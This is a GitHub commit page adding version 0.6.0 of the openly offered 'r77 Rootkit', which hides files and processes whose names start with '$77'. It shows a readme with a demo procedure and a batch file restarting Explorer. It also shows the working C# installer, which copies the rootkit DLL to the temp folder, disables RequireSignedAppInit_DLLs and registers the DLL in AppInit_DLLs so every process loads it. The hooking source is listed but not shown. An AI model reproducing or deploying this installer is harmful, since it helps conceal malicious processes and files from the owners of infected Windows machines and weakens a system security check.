Skip to content
Permalink
Browse files

0.6.0

  • Loading branch information...
bytecode77 committed Dec 17, 2017
1 parent f053e5f commit df35bfc3f897fb745f40b088383a068edb113a6b
Showing with 4,256 additions and 0 deletions.
  1. BIN !Docs/Examples/$77-ExampleExecutable.exe
  2. +10 −0 !Docs/Examples/Readme.txt
  3. BIN !Docs/ImageBanner.pdn
  4. +2 −0 !Docs/Rescue.txt
  5. +2 −0 !Docs/Restart Explorer.bat
  6. +16 −0 .gitignore
  7. +16 −0 Install/App.xaml
  8. +8 −0 Install/App.xaml.cs
  9. +101 −0 Install/Install.csproj
  10. +43 −0 Install/MainWindow.xaml
  11. +70 −0 Install/MainWindow.xaml.cs
  12. +83 −0 Install/Properties/Resources.Designer.cs
  13. +127 −0 Install/Properties/Resources.resx
  14. BIN Install/Resources/ImageBanner.png
  15. BIN Install/Resources/Install.ico
  16. +16 −0 Install/app.manifest
  17. +23 −0 LICENSE.md
  18. +17 −0 r77-src/FileBothDirInformationEx.h
  19. +14 −0 r77-src/FileDirectoryInformationEx.h
  20. +15 −0 r77-src/FileFullDirInformationEx.h
  21. +18 −0 r77-src/FileIdBothDirInformationEx.h
  22. +16 −0 r77-src/FileIdFullDirInformationEx.h
  23. +67 −0 r77-src/FileInformationClassEx.h
  24. +7 −0 r77-src/FileNamesInformationEx.h
  25. +322 −0 r77-src/MinHook/HDE/hde32.c
  26. +105 −0 r77-src/MinHook/HDE/hde32.h
  27. +333 −0 r77-src/MinHook/HDE/hde64.c
  28. +112 −0 r77-src/MinHook/HDE/hde64.h
  29. +39 −0 r77-src/MinHook/HDE/pstdint.h
  30. +73 −0 r77-src/MinHook/HDE/table32.h
  31. +74 −0 r77-src/MinHook/HDE/table64.h
  32. +169 −0 r77-src/MinHook/MinHook.h
  33. +315 −0 r77-src/MinHook/buffer.c
  34. +42 −0 r77-src/MinHook/buffer.h
  35. +880 −0 r77-src/MinHook/hook.c
  36. +316 −0 r77-src/MinHook/trampoline.c
  37. +105 −0 r77-src/MinHook/trampoline.h
  38. +149 −0 r77-src/Rootkit.cpp
  39. +18 −0 r77-src/Rootkit.h
  40. +13 −0 r77-src/SystemProcessInformationEx.h
  41. +10 −0 r77-src/main.cpp
  42. +24 −0 r77-src/r77.h
  43. +111 −0 r77-x64/r77-x64.vcxproj
  44. +93 −0 r77-x64/r77-x64.vcxproj.filters
  45. +111 −0 r77-x86/r77-x86.vcxproj
  46. +93 −0 r77-x86/r77-x86.vcxproj.filters
  47. +78 −0 r77.sln
Binary file not shown.
@@ -0,0 +1,10 @@
r77 Rootkit fill hide files and processes that start with "$77" (without the quotes)

Example to test the effects:
1. Run "$77-ExampleExecutable.exe"
2. It's visible in Task Manager
3. Install rootkit
4. Restart Task Manager
5. It's no longer visible in Task Manager
6. Restart Explorer
7. Guess what... It's hidden there, too.
Binary file not shown.
@@ -0,0 +1,2 @@
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Windows
@@ -0,0 +1,2 @@
taskkill /f /IM explorer.exe
start explorer.exe
@@ -0,0 +1,16 @@
.vs/
bin/
obj/
Debug/
Release/
ipch/
TestResults/
*.suo
*.user
*.sdf
*.opensdf
*.opendb
*.VC.db
[Tt]humbs.db

$Build/
@@ -0,0 +1,16 @@
<Application
x:Class="Install.App"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="clr-namespace:Install"
StartupUri="MainWindow.xaml">
<Application.Resources>
<Style TargetType="{x:Type Image}">
<Setter Property="Stretch" Value="None" />
</Style>
<Style TargetType="{x:Type Button}">
<Setter Property="Padding" Value="15,5" />
<Setter Property="MinWidth" Value="75" />
</Style>
</Application.Resources>
</Application>
@@ -0,0 +1,8 @@
using System.Windows;

namespace Install
{
public partial class App : Application
{
}
}
@@ -0,0 +1,101 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{751136EE-F31F-4FDB-BA60-2AD68356F1A0}</ProjectGuid>
<OutputType>WinExe</OutputType>
<RootNamespace>Install</RootNamespace>
<AssemblyName>Install</AssemblyName>
<TargetFrameworkVersion>v4.6.1</TargetFrameworkVersion>
<FileAlignment>512</FileAlignment>
<ProjectTypeGuids>{60dc8134-eba5-43b8-bcc9-bb4bc16c2548};{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}</ProjectTypeGuids>
<WarningLevel>4</WarningLevel>
<AutoGenerateBindingRedirects>true</AutoGenerateBindingRedirects>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
<Prefer32Bit>false</Prefer32Bit>
</PropertyGroup>
<PropertyGroup>
<ApplicationManifest>app.manifest</ApplicationManifest>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Xml" />
<Reference Include="Microsoft.CSharp" />
<Reference Include="System.Core" />
<Reference Include="System.Xml.Linq" />
<Reference Include="System.Data.DataSetExtensions" />
<Reference Include="System.Net.Http" />
<Reference Include="System.Xaml">
<RequiredTargetFramework>4.0</RequiredTargetFramework>
</Reference>
<Reference Include="WindowsBase" />
<Reference Include="PresentationCore" />
<Reference Include="PresentationFramework" />
</ItemGroup>
<ItemGroup>
<ApplicationDefinition Include="App.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</ApplicationDefinition>
<Page Include="MainWindow.xaml">
<Generator>MSBuild:Compile</Generator>
<SubType>Designer</SubType>
</Page>
<Compile Include="App.xaml.cs">
<DependentUpon>App.xaml</DependentUpon>
<SubType>Code</SubType>
</Compile>
<Compile Include="MainWindow.xaml.cs">
<DependentUpon>MainWindow.xaml</DependentUpon>
<SubType>Code</SubType>
</Compile>
</ItemGroup>
<ItemGroup>
<Compile Include="Properties\Resources.Designer.cs">
<AutoGen>True</AutoGen>
<DesignTime>True</DesignTime>
<DependentUpon>Resources.resx</DependentUpon>
</Compile>
<EmbeddedResource Include="Properties\Resources.resx">
<Generator>ResXFileCodeGenerator</Generator>
<LastGenOutput>Resources.Designer.cs</LastGenOutput>
</EmbeddedResource>
</ItemGroup>
<ItemGroup>
<None Include="app.manifest" />
</ItemGroup>
<ItemGroup>
<Resource Include="Resources\ImageBanner.png" />
</ItemGroup>
<ItemGroup>
<Resource Include="Resources\Install.ico" />
</ItemGroup>
<Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
<PropertyGroup>
<PostBuildEvent>mkdir $(SolutionDir)$Build
xcopy /Y $(TargetPath) $(SolutionDir)$Build</PostBuildEvent>
</PropertyGroup>
</Project>
@@ -0,0 +1,43 @@
<Window
x:Class="Install.MainWindow"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
xmlns:local="clr-namespace:Install"
mc:Ignorable="d"
Title="Install / Uninstall r77 Rootkit" Width="500" SizeToContent="Height" ResizeMode="CanMinimize" WindowStartupLocation="CenterScreen" Icon="/Install;component/Resources/Install.ico">
<Grid>
<StackPanel>
<Grid>
<Image Source="/Install;component/Resources/ImageBanner.png" />
<Label Content="Version 0.6.0" VerticalAlignment="Bottom" HorizontalAlignment="Right" />
</Grid>
<StackPanel Margin="20">
<TextBlock TextWrapping="Wrap">
<Run Text="r77 Rootkit will hide any" />
<LineBreak />
<Run Text=" • Processes" />
<LineBreak />
<Run Text=" • Files" />
<LineBreak />
<Run Text="That start with &quot;" /><Run Text="$77" FontWeight="Bold" /><Run Text="&quot; prefix." />
<LineBreak />
<LineBreak />
<Run Text="Currently, file hiding does not work in x86 processes (work in progress)." />
<LineBreak />
<LineBreak />
<Run Text="All x64 and x86 processes will be affected, but not already running ones. Restart taskmgr or explorer to see effect." />
</TextBlock>
</StackPanel>
<StackPanel>
<Border Background="#f8f8f8" BorderThickness="0,1,0,0" BorderBrush="#e7e7e7" Padding="10">
<StackPanel Orientation="Horizontal" HorizontalAlignment="Right">
<Button Content="Install" Margin="0,0,10,0" Click="btnInstall_Click" />
<Button Content="Uninstall" Click="btnUninstall_Click" />
</StackPanel>
</Border>
</StackPanel>
</StackPanel>
</Grid>
</Window>
@@ -0,0 +1,70 @@
using Microsoft.Win32;
using System;
using System.IO;
using System.Windows;

namespace Install
{
public partial class MainWindow : Window
{
public MainWindow()
{
InitializeComponent();
}

private void btnInstall_Click(object sender, RoutedEventArgs e)
{
try
{
Install(true);
Install(false);

MessageBox.Show("r77 is now installed to AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
}
catch (Exception ex)
{
MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
}
}
private void btnUninstall_Click(object sender, RoutedEventArgs e)
{
try
{
bool removed = false;

foreach (bool is64bit in new[] { true, false })
{
using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
{
if ((key.GetValue("AppInit_DLLs", "") as string).Contains("$77-"))
{
key.SetValue("AppInit_DLLs", "");
removed = true;
}
}
}

MessageBox.Show(removed ? "r77 was now removed from AppInit_DLLs." : "r77 was not found in AppInit_DLLs.", "Information", MessageBoxButton.OK, MessageBoxImage.Information);
}
catch (Exception ex)
{
MessageBox.Show(ex.GetType() + ": " + ex.Message + "\r\n" + ex.StackTrace, "Error", MessageBoxButton.OK, MessageBoxImage.Error);
}
}

private void Install(bool is64bit)
{
string extension = "x" + (is64bit ? 64 : 86) + ".dll";
string destPath = Path.Combine(Path.GetTempPath(), "$77-" + Guid.NewGuid().ToString("N") + "-" + extension);
File.Copy(Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "r77-" + extension), destPath);
new FileInfo(destPath).Attributes |= FileAttributes.Temporary;

using (RegistryKey key = RegistryKey.OpenBaseKey(RegistryHive.LocalMachine, is64bit ? RegistryView.Registry64 : RegistryView.Registry32).OpenSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows", true))
{
key.SetValue("LoadAppInit_DLLs", 1);
key.SetValue("RequireSignedAppInit_DLLs", 0);
key.SetValue("AppInit_DLLs", destPath);
}
}
}
}

Some generated files are not rendered by default. Learn more.

0 comments on commit df35bfc

Please sign in to comment.
You can’t perform that action at this time.